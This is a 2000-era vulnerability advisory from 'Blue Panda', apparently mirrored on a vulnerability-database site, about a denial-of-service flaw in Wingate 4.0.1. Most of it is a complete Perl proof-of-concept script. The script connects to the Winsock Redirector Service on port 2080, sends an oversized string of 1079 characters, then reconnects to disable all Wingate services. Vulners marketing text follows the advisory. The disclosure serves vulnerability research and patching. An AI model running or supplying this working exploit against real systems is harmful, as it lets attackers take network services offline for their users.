`=================================================================
Blue Panda Vulnerability Announcement: Wingate 4.0.1
02/10/2000 (dd/mm/yyyy)
[email protected]
http://bluepanda.box.sk/
=================================================================
Problem: The Wingate engine can be disabled by sending an abnormal string to
the Winsock Redirecter Service. The attack is not logged.
Vulnerable: Wingate Home/Standard/Pro 4.0.1, possible prior versions
(untested).
Immune: Wingate 4.1 Beta A
Vendor status: Notified.
===================
Proof of concept:
===================
#!/usr/bin/perl
#
# wgate401.pl - Wingate 4.0.1 denial-of-service
# Blue Panda - [email protected]
# http://bluepanda.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# Causes all Wingate services to become unavailable until the Wingate Engine
# is restarted. The Winsock Redirector Service must be enabled in order for
# this to work. Tested on the evaluation version of Wingate Pro 4.0.1.
#
use IO::Socket;
$host = "host.com";
$port = "2080";
$sleepfor = 1;
print "Wingate 4.0.1 denial-of-service
Blue Panda - bluepanda\@dwarf.box.sk
http://bluepanda.box.sk/
----------------------------------------------------------
Disclaimer: this file is intended as proof of concept, and
is not intended to be used for illegal purposes. I accept
no responsibility for damage incurred by the use of it.
----------------------------------------------------------
Causes all Wingate services to become unavailable until the Wingate Engine
is restarted. The Winsock Redirector Service must be enabled in order for
this to work.\n\n";
# Connect to the Winsock Redirector Service.
print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
print "done.\n";
# Send some characters to the Winsock Redirector Service.
$buffer = "a" x 1079;
print $socket "$buffer";
# Wait a few seconds.
$counter = 0;
print "Sleeping for $sleepfor seconds.";
while($counter < $sleepfor) {
sleep(1);
print ".";
$counter += 1;
}
print "\n";
# Close the connection. The Winsock Redirector Service should now be
# disabled.
close($socket);
# Connect once more to the Winsock Redirector Service. This will disable all
# other services.
print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
print "done.\n";
# Finished.
close($socket);
----- End forwarded message -----
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation